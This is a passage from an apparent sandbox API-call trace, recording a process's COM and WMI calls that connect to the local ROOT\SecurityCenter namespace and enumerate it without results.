[6]=0xaf, [7]=0x49)), ppvObject=0x19e57c | out: ppvObject=0x19e57c*=0x0) returned 0x80004002 [0266.317] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e52c | out: ppvObject=0x19e52c*=0x0) returned 0x80004002 [0266.317] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e538 | out: ppvObject=0x19e538*=0x66f8cc) returned 0x0 [0266.317] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f8cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e540 | out: pCid=0x19e540*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.317] WbemLocator:IUnknown:Release (This=0x66f8cc) returned 0x3 [0266.317] CoGetContextToken (in: pToken=0x19e598 | out: pToken=0x19e598) returned 0x0 [0266.317] CoGetContextToken (in: pToken=0x19e9a0 | out: pToken=0x19e9a0) returned 0x0 [0266.317] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea30 | out: ppvObject=0x19ea30*=0x66f954) returned 0x0 [0266.317] WbemLocator:IRpcOptions:Query (in: This=0x66f954, pPrx=0x66f970, dwProperty=2, pdwValue=0x19ea58 | out: pdwValue=0x19ea58) returned 0x80004002 [0266.317] WbemLocator:IUnknown:Release (This=0x66f954) returned 0x3 [0266.317] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x2 [0266.317] CoGetContextToken (in: pToken=0x19ef70 | out: pToken=0x19ef70) returned 0x0 [0266.317] CoGetContextToken (in: pToken=0x19eed0 | out: pToken=0x19eed0) returned 0x0 [0266.318] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x19efa0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19ef9c | out: ppvObject=0x19ef9c*=0x663528) returned 0x0 [0266.318] IUnknown:AddRef (This=0x663528) returned 0x4 [0266.318] IUnknown:Release (This=0x663528) returned 0x3 [0266.318] IUnknown:Release (This=0x663528) returned 0x2 [0266.318] WbemLocator:IUnknown:Release (This=0x54b55e0) returned 0x2 [0266.318] SysStringLen (param_1=0x0) returned 0x0 [0266.318] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542200, puCount=0x19f260 | out: puCount=0x19f260*=0x2) returned 0x0 [0266.318] WbemDefPath:IWbemPath:GetText (in: This=0x5542200, lFlags=4, puBuffLength=0x19f25c*=0x0, pszText=0x0 | out: puBuffLength=0x19f25c*=0x18, pszText=0x0) returned 0x0 [0266.318] WbemDefPath:IWbemPath:GetText (in: This=0x5542200, lFlags=4, puBuffLength=0x19f25c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f25c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.318] CoGetContextToken (in: pToken=0x19f0b0 | out: pToken=0x19f0b0) returned 0x0 [0266.318] IUnknown:AddRef (This=0x663528) returned 0x3 [0266.318] IEnumWbemClassObject:Clone (in: This=0x663528, ppEnum=0x19f26c | out: ppEnum=0x19f26c*=0x6636b8) returned 0x0 [0266.319] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f130 | out: ppvObject=0x19f130*=0x6636bc) returned 0x0 [0266.319] IClientSecurity:QueryBlanket (in: This=0x6636bc, pProxy=0x6636b8, pAuthnSvc=0x19f180, pAuthzSvc=0x19f17c, pServerPrincName=0x19f174, pAuthnLevel=0x19f178, pImpLevel=0x19f168, pAuthInfo=0x19f16c, pCapabilites=0x19f170 | out: pAuthnSvc=0x19f180*=0xa, pAuthzSvc=0x19f17c*=0x0, pServerPrincName=0x19f174, pAuthnLevel=0x19f178*=0x6, pImpLevel=0x19f168*=0x2, pAuthInfo=0x19f16c, pCapabilites=0x19f170*=0x1) returned 0x0 [0266.319] IUnknown:Release (This=0x6636bc) returned 0x1 [0266.319] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f124 | out: ppvObject=0x19f124*=0x66fc70) returned 0x0 [0266.319] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f120 | out: ppvObject=0x19f120*=0x6636bc) returned 0x0 [0266.319] IClientSecurity:SetBlanket (This=0x6636bc, pProxy=0x6636b8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.321] IUnknown:Release (This=0x6636bc) returned 0x2 [0266.321] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x1 [0266.321] CoTaskMemFree (pv=0x54bc508) [0266.321] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed0c | out: ppvObject=0x19ed0c*=0x66fc70) returned 0x0 [0266.322] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ecc8 | out: ppvObject=0x19ecc8*=0x0) returned 0x80004002 [0266.322] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x0) returned 0x80004002 [0266.323] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e8bc | out: ppvObject=0x19e8bc*=0x0) returned 0x80004002 [0266.324] WbemLocator:IUnknown:AddRef (This=0x66fc70) returned 0x3 [0266.324] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e624 | out: ppvObject=0x19e624*=0x0) returned 0x80004002 [0266.324] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e5d4 | out: ppvObject=0x19e5d4*=0x0) returned 0x80004002 [0266.324] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5e0 | out: ppvObject=0x19e5e0*=0x66fbcc) returned 0x0 [0266.324] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66fbcc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e5e8 | out: pCid=0x19e5e8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.324] WbemLocator:IUnknown:Release (This=0x66fbcc) returned 0x3 [0266.324] CoGetContextToken (in: pToken=0x19e640 | out: pToken=0x19e640) returned 0x0 [0266.325] CoGetContextToken (in: pToken=0x19ea48 | out: pToken=0x19ea48) returned 0x0 [0266.325] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ead8 | out: ppvObject=0x19ead8*=0x66fc54) returned 0x0 [0266.325] WbemLocator:IRpcOptions:Query (in: This=0x66fc54, pPrx=0x66fc70, dwProperty=2, pdwValue=0x19eb00 | out: pdwValue=0x19eb00) returned 0x80004002 [0266.325] WbemLocator:IUnknown:Release (This=0x66fc54) returned 0x3 [0266.325] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x2 [0266.325] CoGetContextToken (in: pToken=0x19f020 | out: pToken=0x19f020) returned 0x0 [0266.325] CoGetContextToken (in: pToken=0x19ef80 | out: pToken=0x19ef80) returned 0x0 [0266.325] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x19f050*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f04c | out: ppvObject=0x19f04c*=0x6636b8) returned 0x0 [0266.325] IUnknown:AddRef (This=0x6636b8) returned 0x4 [0266.325] IUnknown:Release (This=0x6636b8) returned 0x3 [0266.326] IUnknown:Release (This=0x6636b8) returned 0x2 [0266.326] IUnknown:Release (This=0x663528) returned 0x2 [0266.326] SysStringLen (param_1=0x0) returned 0x0 [0266.326] IEnumWbemClassObject:Reset (This=0x6636b8) returned 0x0 [0266.327] CoTaskMemAlloc (cb=0x4) returned 0x54ba2f8 [0266.327] IEnumWbemClassObject:Next (in: This=0x6636b8, lTimeout=-1, uCount=0x1, apObjects=0x54ba2f8, puReturned=0x23fd65c | out: apObjects=0x54ba2f8*=0x0, puReturned=0x23fd65c*=0x0) returned 0x1 [0266.327] CoTaskMemFree (pv=0x54ba2f8) [0266.328] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.328] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x1 [0266.328] IUnknown:Release (This=0x6636b8) returned 0x0 [0266.329] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.329] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x1 [0266.329] IUnknown:Release (This=0x663528) returned 0x0 [0266.330] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f288 | out: ppv=0x19f288*=0x601a94) returned 0x0 [0266.330] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f280 | out: pAptType=0x19f280*=1) returned 0x0 [0266.330] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f284 | out: ppvObject=0x19f284*=0x0) returned 0x80004002 [0266.330] IUnknown:Release (This=0x601a94) returned 0x1 [0266.331] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ebf0 | out: ppv=0x19ebf0*=0x54ba298) returned 0x0 [0266.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba298, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ee08 | out: ppvObject=0x19ee08*=0x0) returned 0x80004002 [0266.332] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba298, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee1c | out: ppvObject=0x19ee1c*=0x5542350) returned 0x0 [0266.332] WbemDefPath:IUnknown:Release (This=0x54ba298) returned 0x0 [0266.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x5542350) returned 0x0 [0266.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e9f8 | out: ppvObject=0x19e9f8*=0x0) returned 0x80004002 [0266.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e5ec | out: ppvObject=0x19e5ec*=0x0) returned 0x80004002 [0266.332] WbemDefPath:IUnknown:AddRef (This=0x5542350) returned 0x3 [0266.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e354 | out: ppvObject=0x19e354*=0x0) returned 0x80004002 [0266.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e304 | out: ppvObject=0x19e304*=0x0) returned 0x80004002 [0266.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e310 | out: ppvObject=0x19e310*=0x5544ac8) returned 0x0 [0266.332] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5544ac8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e318 | out: pCid=0x19e318*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.332] WbemDefPath:IUnknown:Release (This=0x5544ac8) returned 0x3 [0266.333] CoGetContextToken (in: pToken=0x19e370 | out: pToken=0x19e370) returned 0x0 [0266.333] CoGetContextToken (in: pToken=0x19e778 | out: pToken=0x19e778) returned 0x0 [0266.333] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e808 | out: ppvObject=0x19e808*=0x0) returned 0x80004002 [0266.333] WbemDefPath:IUnknown:Release (This=0x5542350) returned 0x2 [0266.333] WbemDefPath:IUnknown:Release (This=0x5542350) returned 0x1 [0266.333] CoGetContextToken (in: pToken=0x19f100 | out: pToken=0x19f100) returned 0x0 [0266.333] CoGetContextToken (in: pToken=0x19f060 | out: pToken=0x19f060) returned 0x0 [0266.333] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x19f130*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f12c | out: ppvObject=0x19f12c*=0x5542350) returned 0x0 [0266.333] WbemDefPath:IUnknown:AddRef (This=0x5542350) returned 0x3 [0266.334] WbemDefPath:IUnknown:Release (This=0x5542350) returned 0x2 [0266.334] WbemDefPath:IWbemPath:SetText (This=0x5542350, uMode=0x4, pszPath="ROOT\\SecurityCenter") returned 0x0 [0266.334] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542350, puCount=0x19f2b0 | out: puCount=0x19f2b0*=0x2) returned 0x0 [0266.334] WbemDefPath:IWbemPath:GetText (in: This=0x5542350, lFlags=4, puBuffLength=0x19f2ac*=0x0, pszText=0x0 | out: puBuffLength=0x19f2ac*=0x18, pszText=0x0) returned 0x0 [0266.334] WbemDefPath:IWbemPath:GetText (in: This=0x5542350, lFlags=4, puBuffLength=0x19f2ac*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f2ac*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.334] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542350, puCount=0x19f29c | out: puCount=0x19f29c*=0x2) returned 0x0 [0266.334] WbemDefPath:IWbemPath:GetText (in: This=0x5542350, lFlags=4, puBuffLength=0x19f298*=0x0, pszText=0x0 | out: puBuffLength=0x19f298*=0x18, pszText=0x0) returned 0x0 [0266.334] WbemDefPath:IWbemPath:GetText (in: This=0x5542350, lFlags=4, puBuffLength=0x19f298*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f298*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.334] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f230 | out: ppv=0x19f230*=0x601a94) returned 0x0 [0266.334] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f228 | out: pAptType=0x19f228*=1) returned 0x0 [0266.334] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f22c | out: ppvObject=0x19f22c*=0x0) returned 0x80004002 [0266.334] IUnknown:Release (This=0x601a94) returned 0x1 [0266.335] CoGetClassObject (in: rclsid=0x6bdd2c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ee50 | out: ppv=0x19ee50*=0x5544af8) returned 0x0 [0266.336] WbemLocator:IUnknown:QueryInterface (in: This=0x5544af8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x0) returned 0x80004002 [0266.336] WbemLocator:IClassFactory:CreateInstance (in: This=0x5544af8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f07c | out: ppvObject=0x19f07c*=0x54ba228) returned 0x0 [0266.336] WbemLocator:IUnknown:Release (This=0x5544af8) returned 0x0 [0266.336] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba228, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec9c | out: ppvObject=0x19ec9c*=0x54ba228) returned 0x0 [0266.336] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba228, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec58 | out: ppvObject=0x19ec58*=0x0) returned 0x80004002 [0266.336] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba228, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e84c | out: ppvObject=0x19e84c*=0x0) returned 0x80004002 [0266.336] WbemLocator:IUnknown:AddRef (This=0x54ba228) returned 0x3 [0266.336] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba228, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e5b4 | out: ppvObject=0x19e5b4*=0x0) returned 0x80004002 [0266.336] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba228, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e564 | out: ppvObject=0x19e564*=0x0) returned 0x80004002 [0266.336] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba228, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e570 | out: ppvObject=0x19e570*=0x0) returned 0x80004002 [0266.336] CoGetContextToken (in: pToken=0x19e5d0 | out: pToken=0x19e5d0) returned 0x0 [0266.337] CoGetContextToken (in: pToken=0x19e9d8 | out: pToken=0x19e9d8) returned 0x0 [0266.337] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba228, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea68 | out: ppvObject=0x19ea68*=0x0) returned 0x80004002 [0266.337] WbemLocator:IUnknown:Release (This=0x54ba228) returned 0x2 [0266.337] WbemLocator:IUnknown:Release (This=0x54ba228) returned 0x1 [0266.337] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0266.337] CoGetContextToken (in: pToken=0x19efa8 | out: pToken=0x19efa8) returned 0x0 [0266.337] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba228, riid=0x19f078*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19f074 | out: ppvObject=0x19f074*=0x54ba228) returned 0x0 [0266.337] WbemLocator:IUnknown:AddRef (This=0x54ba228) returned 0x3 [0266.337] WbemLocator:IUnknown:Release (This=0x54ba228) returned 0x2 [0266.337] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542350, puCount=0x19f20c | out: puCount=0x19f20c*=0x2) returned 0x0 [0266.337] WbemDefPath:IWbemPath:GetText (in: This=0x5542350, lFlags=8, puBuffLength=0x19f208*=0x0, pszText=0x0 | out: puBuffLength=0x19f208*=0x18, pszText=0x0) returned 0x0 [0266.337] WbemDefPath:IWbemPath:GetText (in: This=0x5542350, lFlags=8, puBuffLength=0x19f208*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f208*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.337] CoCreateInstance (in: rclsid=0x6d3c1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d3c12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f0d0 | out: ppv=0x19f0d0*=0x54ba1d8) returned 0x0 [0266.338] WbemLocator:IWbemLocator:ConnectServer (in: This=0x54ba1d8, strNetworkResource="\\\\.\\ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x19f178 | out: ppNamespace=0x19f178*=0x54b56d0) returned 0x0 [0266.350] WbemLocator:IUnknown:QueryInterface (in: This=0x54b56d0, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f000 | out: ppvObject=0x19f000*=0x66fb4c) returned 0x0 [0266.350] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66fb4c, pProxy=0x54b56d0, pAuthnSvc=0x19f050, pAuthzSvc=0x19f04c, pServerPrincName=0x19f044, pAuthnLevel=0x19f048, pImpLevel=0x19f038, pAuthInfo=0x19f03c, pCapabilites=0x19f040 | out: pAuthnSvc=0x19f050*=0xa, pAuthzSvc=0x19f04c*=0x0, pServerPrincName=0x19f044, pAuthnLevel=0x19f048*=0x6, pImpLevel=0x19f038*=0x2, pAuthInfo=0x19f03c, pCapabilites=0x19f040*=0x1) returned 0x0 [0266.350] WbemLocator:IUnknown:Release (This=0x66fb4c) returned 0x1 [0266.350] 